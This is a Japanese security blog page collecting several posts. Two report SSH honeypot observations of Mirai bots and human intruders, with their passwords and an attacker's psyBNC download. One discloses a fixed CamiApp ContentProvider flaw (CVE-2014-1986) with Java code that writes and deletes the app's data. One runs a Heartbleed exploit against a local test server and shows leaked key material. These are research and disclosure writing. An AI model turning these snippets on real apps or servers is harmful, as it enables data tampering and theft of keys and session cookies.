<!DOCTYPE html>
<html lang="ja-JP">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta content="" name="keywords">
<meta content="antimon" property="og:title">
<title>antimon</title>
<link rel="stylesheet" href="https://antimon.xyz/css/style.css">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/github.min.css">


<section class="section">
  <div class="container">
    <nav class="nav">
      <div class="nav-left">
        <a class="nav-item" href="https://antimon.xyz"><h1 class="title is-4">antimon</h1></a>
      </div>
      <div class="nav-right">
        <nav class="nav-item level is-mobile">
          
          <a class="level-item" href="https://twitter.com/magiauk">
            <span class="icon">
              <i class="fa fa-twitter"></i>
            </span>
          </a>
          
          <a class="level-item" href="/index.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>
          </a>
          
        </nav>
      </div>
    </nav>
  </div>
</section>

<section class="section">
  <div class="container">
    
    <article>
      <h2 class="subtitle is-6">March 21, 2017</h2>
      <h1 class="title"><a href="https://antimon.xyz/2017/03/21/attacker/">侵入してきた攻撃者の動向</a></h1>
      
        <div class="tags">
    
        <a class="button is-link" href="/tags/security">security</a>
    
</div>

      
      <div class="content">
        <p>前回の日本のIPアドレスからの攻撃元一覧表における23と24について、攻撃者の動向を調査してみる。</p>

<table>
<thead>
<tr>
<th>No.</th>
<th>IPアドレス</th>
<th>クライアント情報</th>
<th>回線</th>
</tr>
</thead>

<tbody>
<tr>
<td>23</td>
<td>60.128.11.XXX</td>
<td>SSH-2.0-PuTTY_Release_0.63</td>
<td>GIGAINFRA Softbank BB Corp.</td>
</tr>

<tr>
<td>24</td>
<td>183.77.227.XX</td>
<td>SSH-2.0-PuTTY_Release_0.67</td>
<td>ASAHI-NET Asahi Net</td>
</tr>
</tbody>
</table>

<p>これら2つのクライアント情報を確認するとPuTTYを使用していることがわかる。少なくともこれら2つの攻撃者はWindowsマシンを使用していると推測できる。</p>

<p>まず23の攻撃者について、この攻撃者はユーザ名:test、パスワード:testを使用して侵入し、ポートフォワードでIPアドレスを確認するサイトに接続している。その後、セッションは切断となっているため、環境が使用できるかどうかのチェックが目的だったのかもしくは間違えて接続しただけなのか、これだけでは不明である。</p>

<p>しかし、このIPアドレス等から調べてみると、この攻撃者はネットワークやソーシャルゲーム、チート等に興味があるようである。そのことから、踏み台を探しているのではないかという推測もできる。</p>

<p>次に24の攻撃者について、この攻撃者はユーザ名:root、パスワード:passwordを使用して侵入している。その後、wgetコマンドを使用して次のURLからIRCのリレーサーバであるpsyBNCをダウンロードし展開している。</p>

<p>http[:]//psybnc[.]at/download/beta/psyBNC-2.3.2-9.tar.gz</p>

<p>しかし、展開した後ダウンロードしたファイルおよび展開したディレクトリを削除している。問題なくダウンロードできたかを確認しているのではないかと推測する。その後、コマンド履歴を削除しホスト名を<strong>muie.com</strong>に変更しようとするが、コマンドの入力ミス(hostnameをhistnameとtypoしている?)で変更できず、接続を切っている。</p>

<p><img src="/images/attacker_24_console.gif" alt="24の攻撃者のコマンド入力" /></p>

<p>引き続き攻撃を観測し、動きがあればまとめてみようと思う。</p>

      </div>
    </article>
    
    <article>
      <h2 class="subtitle is-6">March 18, 2017</h2>
      <h1 class="title"><a href="https://antimon.xyz/2017/03/18/mirai/">日本におけるMirai BotNet</a></h1>
      
        <div class="tags">
    
        <a class="button is-link" href="/tags/security">security</a>
    
</div>

      
      <div class="content">
        <p>約3年ぶりに更新する気になったので、心機一転Tumblrからこちらに移行して再開。</p>

<p>先月から観測を始め、そろそろ1ヶ月になるということもありデータが溜まってきたのでまとめてみる。</p>

<p><img src="/images/sensor_attackcount.png" alt="攻撃カウント状況" /></p>

<p>設置した2月21日から3月17日までの攻撃カウントはこのようになっている。2月末から3月頭に活発になっていて、最近は落ち着いているようである。</p>

<p><img src="/images/sensor_country.png" alt="攻撃元国" /></p>

<p>攻撃元の国としてはロシアからの攻撃が一番多く全体の30.4%を占めている。その次にアメリカが28%、ノルウェー24.9%、中国2.3%、ドイツ1.9%、その他となっている。</p>

<p><img src="/images/sensor_password.png" alt="パスワード" /></p>

<p>これは攻撃に使用されたパスワードである。xc3511やvizxv、default、admin、juantech、54321、anko、xmhdipcといったパスワードが多い。これらはMirai BotNetが使用するパスワードであり、このことからMirai BotNetからの攻撃が多いと判断できる。</p>

<p>攻撃元を日本とした場合はどうなのか。攻撃元が日本のIPアドレスは次のとおりである。</p>

<table>
<thead>
<tr>
<th>No.</th>
<th>IPアドレス</th>
<th>クライアント情報</th>
<th>回線</th>
</tr>
</thead>

<tbody>
<tr>
<td>1</td>
<td>106.166.193.XX</td>
<td>SSH-2.0-sshlib-0.1</td>
<td>KDDI KDDI CORPORATION</td>
</tr>

<tr>
<td>2</td>
<td>111.100.153.XX</td>
<td>SSH-2.0-sshlib-0.1</td>
<td>KDDI KDDI CORPORATION</td>
</tr>

<tr>
<td>3</td>
<td>113.158.61.XXX</td>
<td>SSH-2.0-sshlib-0.1</td>
<td>KDDI DION (KDDI CORPORATION)</td>
</tr>

<tr>
<td>4</td>
<td>119.104.196.XXX</td>
<td>-</td>
<td>KDDI KDDI CORPORATION</td>
</tr>

<tr>
<td>5</td>
<td>120.51.100.XX</td>
<td>-</td>
<td>VECTANT ARTERIA Networks Corporation</td>
</tr>

<tr>
<td>6</td>
<td>183.180.76.XXX</td>
<td>-</td>
<td>VECTANT ARTERIA Networks Corporation</td>
</tr>

<tr>
<td>7</td>
<td>202.215.132.XXX</td>
<td>-</td>
<td>VECTANT ARTERIA Networks Corporation</td>
</tr>

<tr>
<td>8</td>
<td>153.145.139.XX</td>
<td>-</td>
<td>OCN NTT Communications Corporation</td>
</tr>

<tr>
<td>9</td>
<td>153.163.189.XXX</td>
<td>SSH-2.0-sshlib-0.1</td>
<td>OCN NTT Communications Corporation</td>
</tr>

<tr>
<td>10</td>
<td>153.231.161.XX</td>
<td>-</td>
<td>OCN NTT Communications Corporation</td>
</tr>

<tr>
<td>11</td>
<td>52.199.19.XX</td>
<td>-</td>
<td>AMAZON-02 - Amazon.com, Inc.</td>
</tr>

<tr>
<td>12</td>
<td>54.238.249.XXX</td>
<td>-</td>
<td>AMAZON-02 - Amazon.com, Inc.</td>
</tr>

<tr>
<td>13</td>
<td>119.229.121.XX</td>
<td>-</td>
<td>K-OPTICOM K-Opticom Corporation</td>
</tr>

<tr>
<td>14</td>
<td>218.42.252.XXX</td>
<td>-</td>
<td>K-OPTICOM K-Opticom Corporation</td>
</tr>

<tr>
<td>15</td>
<td>125.199.86.XXX</td>
<td>SSH-2.0-sshlib-0.1</td>
<td>BIGLOBE BIGLOBE Inc.</td>
</tr>

<tr>
<td>16</td>
<td>203.136.156.XXX</td>
<td>-</td>
<td>BIGLOBE BIGLOBE Inc.</td>
</tr>

<tr>
<td>17</td>
<td>27.54.125.XXX</td>
<td>-</td>
<td>FBDC FreeBit Co.,Ltd.</td>
</tr>

<tr>
<td>18</td>
<td>126.114.210.XX</td>
<td>-</td>
<td>GIGAINFRA Softbank BB Corp.</td>
</tr>

<tr>
<td>19</td>
<td>163.44.168.XXX</td>
<td>-</td>
<td>INTERQ GMO Internet,Inc</td>
</tr>

<tr>
<td>20</td>
<td>182.168.142.XX</td>
<td>-</td>
<td>SO-NET So-net Entertainment Corporation</td>
</tr>

<tr>
<td>21</td>
<td>202.143.199.XXX</td>
<td>-</td>
<td>MABLE San-in Cable Vision CO.,LTD</td>
</tr>

<tr>
<td>22</td>
<td>222.231.84.XXX</td>
<td>-</td>
<td>AS-ENECOM Energia Communications,Inc.</td>
</tr>

<tr>
<td>23</td>
<td>60.128.11.XXX</td>
<td>SSH-2.0-PuTTY_Release_0.63</td>
<td>GIGAINFRA Softbank BB Corp.</td>
</tr>

<tr>
<td>24</td>
<td>183.77.227.XX</td>
<td>SSH-2.0-PuTTY_Release_0.67</td>
<td>ASAHI-NET Asahi Net</td>
</tr>
</tbody>
</table>

<p>現時点で24のIPアドレスを確認していて、このうち1から22までは行動等からMirai BotNetからの攻撃である。残りの2IPアドレスはMirai BotNetではなく攻撃者が存在している。</p>

<p>使用している回線はKDDIやアルテリア・ネットワークス、OCN、Amazonというように特に特徴はみられない。</p>

<p><img src="/images/sensor_japan.png" alt="日本における攻撃元の位置情報" /></p>

<p>IPアドレスから求めた位置情報を地図にマッピングするとこのようになる。日本国内においてもMirai BotNetに感染している端末がすくなからずあることがわかる。今後これがどのように広がっていくのか引き続き観測していく。</p>

<p>23および24については、別途詳細をまとめるつもりである。</p>

      </div>
    </article>
    
    <article>
      <h2 class="subtitle is-6">April 18, 2014</h2>
      <h1 class="title"><a href="https://antimon.xyz/2014/04/18/r-sim7/">下駄R-SIM7&#43;を使用したiPhone 5で発生する圏外病の解決方法</a></h1>
      
        <div class="tags">
    
        <a class="button is-link" href="/tags/iphone">iphone</a>
    
        <a class="button is-link" href="/tags/jailbreak">jailbreak</a>
    
</div>

      
      <div class="content">
        <p>R-SIM7+はいわゆる下駄とよばれるもので、SIMロックがかかっている端末でこの下駄を使用すると、他のキャリアのSIMを使用して通信することができる。</p>

<p>SoftBankのiPhone 5はSIMロックがかかっているのでdocomoのSIMを挿してもdocomoのネットワークは使用できない。しかし、下駄を使用することでSoftBankのiPhone 5でもdocomoのSIMを挿してdocomoのネットワークを使用して通信することができるようになる。</p>

<p><img src="/images/rsim7_iphone5.jpg" alt="iPhone 5の写真" /></p>

<p>下駄は様々なメーカーが販売しているがR-SIM7+と呼ばれるものを使用している。基本的に、説明書通りに設定すれば使用できるのだが、たまに圏外になりそれ以降あれこれしても電波を掴まなくなり、最終的にSIMの抜き差しを繰り返したりして電波を掴むまで試行錯誤する必要が出てくる。いわゆる圏外病とよばれる症状になる。</p>

<p>ということで、その解決方法はiPhone 5をjailbreakしてCarrier Bundleをいじるというもの。これにより圏外病の発生をなくすことができる。</p>

<p>SoftBankのbundleはiOS7が動作しているiPhone 5の場合 /System/Library/Carrier Bundles/iPhone/Softbank_jp.bundle にある。</p>

<p><img src="/images/rsim7_directory.png" alt="ディレクトリのスクリーンショット" /></p>

<p>このディレクトリの中にある次のファイル</p>

<ul>
<li>overrides_N41_N42.plist</li>
<li>overrides_N41_N42.pri</li>
</ul>

<p>これらを削除する。これらファイルはLTEのためのものであり、これらを削除することで設定が書き換わることがなくなるので圏外病が発生しなくなる(LTEに必要なものを削除するのでLTEは使用できなくなる)。</p>

<p>また、このディレクトリにあるcarrier.plistを使用するキャリアに合わせて適宜変更しておくと便利。apnsの項目にAPNの情報を追加したり、type-maskを変更しておくとテザリングが使用できるようになったりする。</p>

      </div>
    </article>
    
    <article>
      <h2 class="subtitle is-6">April 17, 2014</h2>
      <h1 class="title"><a href="https://antimon.xyz/2014/04/17/camiapp/">Android版CamiAppにおけるContent Providerのアクセス制限不備の脆弱性 (CVE-2014-1986)</a></h1>
      
        <div class="tags">
    
        <a class="button is-link" href="/tags/android">android</a>
    
        <a class="button is-link" href="/tags/%E8%84%86%E5%BC%B1%E6%80%A7">脆弱性</a>
    
        <a class="button is-link" href="/tags/security">security</a>
    
</div>

      
      <div class="content">
        <p>CamiAppとは、コクヨS&amp;Tが提供している専用のノートをこのアプリで撮影すると傾きなどを自動で補正してデータ化して管理してくれるアプリ。Android版とiOS版のアプリが提供されているが、Android版でアクセス制限不備の脆弱性が見つかり修正された。重要なことなのでもう一度、<strong>現在公開されているバージョンは修正済み</strong>。</p>

<p>対象バージョンのCamiAppを見てみると、AndroidManifest.xmlは次のようになっている。</p>

<pre><code class="language-xml">&lt;provider android:authorities=&quot;jp.co.kokuyost.CamiApp.Data.CamiDBProvider&quot; android:name=&quot;.Data.CamiDBProvider&quot;&gt;&lt;/provider&gt;
</code></pre>

<p>provider要素にandroid:exported属性が付いていない。ということは、この属性値はデフォルト値が使用されることになる。</p>

<p>provider要素のandroid:exported属性のデフォルト値は、android:minSdkVersion属性またはandroid:targetSdkVersion属性の値で次のように変わる。</p>

<ul>
<li>android:minSdkVersion属性またはandroid:targetSdkVersion属性の値が16以下の場合、true</li>
<li>android:minSdkVersion属性またはandroid:targetSdkVersion属性の値が17以上の場合、false</li>
</ul>

<p>Googleの<a href="https://developer.android.com/guide/topics/manifest/provider-element.html#exported">API Guidesの該当箇所</a>には次のように記述されている。</p>

<blockquote>
<p>The default value is &ldquo;true&rdquo; for applications that set either android:minSdkVersion or
android:targetSdkVersion to &ldquo;16&rdquo; or lower. For applications that set either of these attributes to &ldquo;17&rdquo;
or higher, the default is &ldquo;false&rdquo;.</p>
</blockquote>

<p>CamiAppのAndroidManifest.xmlをもう一度確認してみると</p>

<pre><code class="language-xml">&lt;uses-sdk android:minsdkversion=&quot;7&quot;&gt;&lt;/uses-sdk&gt;
</code></pre>

<p>このようにandroid:minSdkVersion属性が7となっている。その結果、provider要素のandroid:exported属性のデフォルト値はtrueになる。android:exported属性の値がtrueになるということは、このContentProviderは公開されることになり、他のアプリから自由にアクセスできる。</p>

<p>例えば、次のようなContentProviderに接続してデータを追加するごく普通のコードで、CamiAppにデータを追加する事ができる。</p>

<pre><code class="language-java">String sURI = &quot;content://jp.co.kokuyost.CamiApp.Data.CamiDBProvider&quot;;
ContentValues cVals = new ContentValues();
cVals.put(&quot;uuid&quot;, &quot;11111111&quot;);
cVals.put(&quot;title&quot;, &quot;ここはタイトル&quot;);
cVals.put(&quot;comment&quot;, &quot;ここはコメント&quot;);
getContentResolver().insert(Uri.parse(sURI + &quot;/note&quot;), cVals);
</code></pre>

<p>また、同じようにデータを削除するごくごく普通の次のようなコードで、CamiAppのデータを削除できる。</p>

<pre><code class="language-java">String sURI = &quot;content://jp.co.kokuyost.CamiApp.Data.CamiDBProvider&quot;;
getContentResolver().delete(Uri.parse(sURI + &quot;/note_tag&quot;), null, null);
getContentResolver().delete(Uri.parse(sURI + &quot;/note&quot;), null, null);
getContentResolver().delete(Uri.parse(sURI + &quot;/tag&quot;), null, null);
</code></pre>

<p>他のアプリと連携してデータのやり取りを行うためにContentProviderを公開しているわけでは無いと思うので、脆弱性だったということになる。</p>

<p>ちなみに修正されたバージョンのCamiAppのAndroidManifest.xmlを確認してみると次のようになっている。</p>

<pre><code class="language-xml">&lt;provider android:authorities=&quot;jp.co.kokuyost.CamiApp.Data.CamiDBProvider&quot; android:exported=&quot;false&quot; android:name=&quot;.Data.CamiDBProvider&quot;&gt;&lt;/provider&gt;
</code></pre>

<p>android:exported属性が付いてfalseが設定されている。結果、ContentProviderは非公開になり他のアプリからアクセス出来ないように修正されていることが確認できる。</p>

<p>しかし、API Level 8以下ではandroid:exported属性が無視され値がfalseでも他のアプリからアクセスできるという話があり、この修正だけでは不十分なような気もする。</p>

<ul>
<li><a href="http://www.taosoftware.co.jp/blog/2011/10/android_contentproviderexport.html">http://www.taosoftware.co.jp/blog/2011/10/android_contentproviderexport.html</a></li>
</ul>

<p>ただ、API Level 8以下の環境で実際に使用しているユーザがどれだけいるのかという疑問もあり、検証はしていない。</p>

      </div>
    </article>
    
    <article>
      <h2 class="subtitle is-6">April 15, 2014</h2>
      <h1 class="title"><a href="https://antimon.xyz/2014/04/15/heartbread/">OpenSSLの脆弱性 (Heartbleedの問題) のexploitコードを試す</a></h1>
      
        <div class="tags">
    
        <a class="button is-link" href="/tags/android">android</a>
    
        <a class="button is-link" href="/tags/%E8%84%86%E5%BC%B1%E6%80%A7">脆弱性</a>
    
        <a class="button is-link" href="/tags/security">security</a>
    
</div>

      
      <div class="content">
        <p>exploitコードはいろいろ出ているけど、オレオレ証明書を使用してApache2でSSL通信できるようにして試してみた。</p>

<ul>
<li>Ubuntu 12.10 amd64

<ul>
<li>192.168.1.10</li>
</ul></li>
</ul>

<p>秘密鍵、証明書要求、証明書は次のように生成。</p>

<pre><code class="language-bash">$ openssl genrsa 1024 &gt; server.key
$ openssl req -new -key server.key &gt; server.csr
$ openssl x509 -in server.csr -days 365 -req -signkey server.key &gt; server.crt
</code></pre>

<p>生成した鍵、証明書を使用するようApache2の設定を行う。</p>

<pre><code class="language-apache">SSLCertificateFile /etc/apache2/ssl/server.crt
SSLCertificateKeyFile /etc/apache2/ssl/server.key
</code></pre>

<p>Apache2を再起動してSSL通信できることを確認したら、次のようにしてexploitコードを実行してみる。</p>

<pre><code class="language-bash">$ heartbleed-altered.py 192.168.1.10
</code></pre>

<p>取得したデータに何が含まれているか確認してみると、</p>

<pre><code>//--中略--//
13e0: C1 9F F9 CF EE 4E 7D 04 86 46 7F EC 4E 50 50 36  .....N}..F..NPP6
13f0: BF 21 B1 E1 1C 79 B3 93 6F 55 ED A8 25 02 06 BC  .!...y..oU..%...
1400: 90 CC 26 1E 9C E9 24 76 3C 58 49 6A A3 D9 7D C1  ..&amp;...$v&lt;XIj..}.
1410: 2D 52 59 0A 0C 03 94 C2 1A 65 51 CF CA 73 AD 2B  -RY......eQ..s.+
1420: 42 73 75 84 35 D6 B8 7A 46 55 F5 57 DF 73 CF 25  Bsu.5..zFU.W.s.%
1430: 24 13 94 78 3B 9D 99 80 EC 58 6B 67 5A C4 F4 5D  $..x;....XkgZ..]
1440: F3 EC BE 57 32 62 FC 35 E7 21 A3 02 03 01 00 01  ...W2b.5.!......
1450: 30 0D 06 09 2A 86 48 86 F7 0D 01 01 05 05 00 03  0...*.H.........
1460: 81 81 00 AF 52 DC AA 63 5B C5 6C 5B E5 DB A7 D5  ....R..c[.l[....
1470: E5 EA D9 34 B9 EF 7C C0 73 21 DD 32 78 A2 32 FD  ...4..|.s!.2x.2.
1480: 8E 90 FC 38 D3 B3 8A F3 05 A4 6B 0E CA AB 70 2D  ...8......k...p-
1490: F5 4D 27 B1 BA FE 57 C1 66 E5 74 48 28 08 26 4A  .M'...W.f.tH(.&amp;J
14a0: 34 D4 3D 75 6E 8F BC 5D C5 0A 9A F8 04 0D 67 F8  4.=un..]......g.
14b0: CA D3 0B E7 4E EB 78 45 A5 D4 74 7C 45 0E 56 E5  ....N.xE..t|E.V.
14c0: 42 07 A5 78 28 C5 A2 6E FF 27 39 F9 18 A6 58 59  B..x(..n.'9...XY
14d0: 72 FB 38 92 8F 3E 7F 1D 41 80 3D 15 41 16 CE A4  r.8..&gt;..A.=.A...
14e0: A8 01 77 16 03 02 01 8D 0C 00 01 89 00 80 D6 7D  ..w............}
//--中略--//
</code></pre>

<p>長いので一部データを省略したけどこれは証明書とほぼ一致。さらに、</p>

<pre><code>3d80: 50 00 00 00 00 00 00 00 5F 6C E8 B2 8B B0 4E AA  P......._l....N.
3d90: 2D 9A 4A E0 D7 6B 8F F6 B3 E2 0D 8E 05 83 FE AB  -.J..k..........
3da0: D4 5B 22 7D 91 71 B7 D2 23 0A 45 4C 52 CB 61 3A  .[&quot;}.q..#.ELR.a:
3db0: A4 E1 E8 6D 51 0D 7E 68 27 00 55 17 BD C8 A9 15  ...mQ.~h'.U.....
3dc0: A3 A9 56 21 58 A9 63 FC 00 00 00 00 00 00 00 00  ..V!X.c.........
</code></pre>

<p>と、これ</p>

<pre><code>fa30: 50 00 00 00 00 00 00 00 3d 11 8d ab d6 f7 14 6b  P.......=......k
fa40: f1 19 ac 5c ba f5 62 31 60 02 d8 62 f8 05 d2 b1  ...\..b1`..b....
fa50: eb 0f 93 d8 93 62 10 0e c5 32 19 ea 53 0d 57 40  .....b...2..S.W@
fa60: 6c b6 8e 50 b2 01 97 d4 e3 e9 07 f9 cd ec 08 65  l..P...........e
fa70: c7 25 cc b0 c9 d3 b9 ed 0d ce 51 77 74 25 40 a5  .%........Qwt%@.
</code></pre>

<p>は、秘密鍵のprime1とprime2とほぼ一致している。</p>

<p>できれば秘密鍵をどーんとそのまま取得したいけど、タイミングとかそういう問題で簡単に取得できそうにはない。でも根気強くやっていれば取得できる可能性はあると思う。</p>

<p>ちなみに、サイトにアクセスしてきたクライアントのセッションIDやcookieの内容とかはexploitコードを走らせていれば、秘密鍵よりは簡単に取得できた。</p>

      </div>
    </article>
    
  </div>
</section>
<section class="section">
  <div class="container">
    <nav class="level is-mobile">
      <div class="level-left">
        <div class="level-item">
          
          <a class="button is-disabled">
            <span class="icon is-small is-marginless">
              <i class="fa fa-angle-left"></i>
            </span>
            Newer
          </a>
          
        </div>
      </div>
      <div class="level-right is-marginless">
        <div class="level-item">
          
          <a class="button is-disabled">
            Older
            <span class="icon is-small is-marginless">
              <i class="fa fa-angle-right"></i>
            </span>
          </a>
          
        </div>
      </div>
    </nav>
  </div>
</section>

<section class="section">
  <div class="container has-text-centered">
    <p>&copy; 2014-2017 magiauk.</p>
  </div>
</section>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js" integrity="sha256-KbfTjB0WZ8vvXngdpJGY3Yp3xKk+tttbqClO11anCIU=" crossorigin="anonymous"></script>

<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/languages/go.min.js"></script>

<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/languages/dockerfile.min.js"></script>

<script>hljs.initHighlightingOnLoad();</script>


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-93929765-1', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>




